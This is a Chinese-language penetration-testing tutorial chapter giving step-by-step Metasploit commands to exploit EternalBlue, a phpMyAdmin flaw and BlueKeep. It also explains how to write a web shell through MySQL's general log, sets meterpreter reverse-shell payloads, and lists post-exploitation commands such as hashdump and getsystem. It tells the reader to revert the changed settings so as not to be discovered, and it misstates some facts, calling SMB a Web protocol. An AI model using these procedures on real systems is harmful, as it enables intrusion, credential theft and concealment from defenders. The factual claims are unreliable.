渗透利器-kali工具 (第五章-4) Metasploit漏洞利用模块一

本文内容:

  • 永恒之蓝
  • 实战漏洞利用
  • MSF会话常用命令

 

1,永恒之蓝:
  永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统可以执行任意代码。

  SMB:Web协议中的一种,就是Web客户端去访问服务器端的一种协议。

  使用MSF实现"永恒之蓝"的快速攻击,就是利用MSF中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。

2,实战漏洞利用:

  1.phpAdmin日志写shell:

    前提条件:用户是root

    思路:

      就是利用mysql的一个日志文件,这个日志文件每执行一个sql语句就会将其执行的语言保存。

      我们将这个日志文件重命名为shell.php 然后去执行一个sql语句,带有一句话木马的命令。

      然后再使用菜刀链接,就可以了。

    设置导出文件:

      general log    OFF--ON

      general log file   设置一个路径,执行sql语句,访问设置的路径即可。

    参考文章:

    注意:完成测试之后,需要将修改设置的地方,修改回来,以防被发现。

  2.MSF获取Get Shell:

    实战演示:phpMyAdmin

    1.查找模块:earch name:phpmyadmin / search CVE-2018-12611

    2.使用模块:use exploit/multi/http/phpmyadmin_lfi_rce

    3.查看设置选项:options [rhosts、targeturl、password]

    4.设置目标地址:set rhosts 127.0.0.1

    5.设置目标范围:set targetrul phpMyAdmin

    6.设置密码:set password root

    7.选择payload:set payload php/meterpreter/reverse_tcp

    8.查看设置选项:options [lhost]

    9.设置本机地址:set lhost 127.0.0.2

    10.开始攻击:run/exploit

  3.永恒之蓝:

    使用模块名:

      auxiliary/scanner/smb/smb_ms17_010

      exploit/windows/smb/ms17_010_eternalblue

    1.查找模块:search ms17

    2.使用模块:use auxiliary/scanner/smb/smb_ms17_010

    3.查看设置选项options[rhosts]

    4.设置目标地址:set rhosts 127.0.0.1

    5.扫描一下:exploit,出现一个绿色的+号,说明易受攻击

    6.使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

    7.查看设置选项:options [rhosts]

    8.设置目标地址:set rhosts 127.0.0.1

    9.设置payload:set payload windows/x64/meterpreter/reverse_tcp [64位的,因为靶机是64位的]

    10.查看设置选项:options [lhost]

    11.设置本地地址:set lhost 127.0.0.2

    12.开始攻击:run

    补充:

      有的时候,在扫描靶机的时候,不会出现绿色+号

      可以使用靶机和kali互相ping一下,看是否能ping通,如果ping不通

      可以查看两个机器的ip是否在同一网段,将他们设置为同一个网段,如果还不行,将靶机防火墙关闭,试试。

      蓝屏是计算机自动保护系统,存在一定几率出现蓝屏。

  4.MSF永恒之蓝[实现蓝屏]:

    Kali,MSF中没有这个:cve-2019-0708exploit

    需要自己安装:git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce

    需要自己配置;

      1. 第一步,配置rdp.rb: 存放rdp.rb到 /usr/share/metasploit-framework/lib/msf/core/exploit 目录下

      2. 第二步,配置rdp_scanner.rb :存放rdp_scanner.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下

      3. 第三步,配置cve_2019_0708_bluekeep.rb:存放cve_2019_0708_bluekeep.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下

      4. 第四步,配置cve_2019_0708_bluekeep_rce.rb:存放cve_2019_0708_bluekeep_rce.rb到/usr/share/metasploit-framework/modules/exploits/windows/rdp ------这里可能没有rdp这个文件夹,如果没有自己创建一个,到这里配置就完成了。

      5.需要全部加载一下:reload_all [否则到时候可能读不到模块]

    实现步骤:

      1.使用辅助模块:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 

      2.设置目标地址:set rhosts 127.0.0.1

      3.检测一下:run 出现绿色 + 号,易受攻击

      4.使用攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

      5.设置目标地址:set rhosts   127.0.0.1

      6.设置端口:set rport 3389

      7.查看攻击方式:show targets

      8.我这里选择vmware 15 就是4 :set target 4

      9.开始攻击:run

  5.shell:

    了解shell:

      连接一般分为正向连接和反向链接:

        正向连接:对方服务器开放端口,让我们去访问:

          例如使用:telnet 127.0.0.1:80

        反向链接:我们开放端口,让对方反问:

          也就是让对方来找我们的端口,例如:反弹shell

    反弹shell:

      reverse shell,端口,被控端发起请求到该端口,并将其命令行的输入就是控制端监听在某TCP/UDP输出到控制端。

    为什么要反弹shell:

      1.某客户机中了你的网马,但是它在局域网内,你直接访问不了,它的IP会动态改变,你不能持续控制。

      2.由于防火墙等限制,对方机器只能发送请求,不能接受请求。

      3.对于病毒,木马受害者什么时候能中号,对方网络环境是什么样的,什么时候关机,都是未知,所以建立一个服务端,让而已程序主动连接,才是上策。

      4.反弹很好理解:攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

3,MSF会话常用命令:

  通过反弹shell获得会话常用命令:

  1.文件系统命令:

    edit           编辑文件

    getlwd         显示本地工作目录

    Dir          列出目标文件目录

    mkdir         创建目录

  2.网络、系统命令:

    ipconfig      显示网络接口信息

    netstat        显示网络连接信息

    execute       执行命令

    ps          列出正在运行的进程

    sysinfo        获取远程系统给的有关信息,例如os

  3.用户界面命令:

    getdesktop     获取当前的Meterpreter桌面

    screenshot     获取目标桌面屏幕截图

  4.提权、密码命令:

    getsystem     尝试将你的权限提升为本地系统的权限

    hashdump     获取目标NTLM-HASH值

 

      

 

    

上一篇:工具使用——Metasploit使用


下一篇:Ubuntu快速安装MSF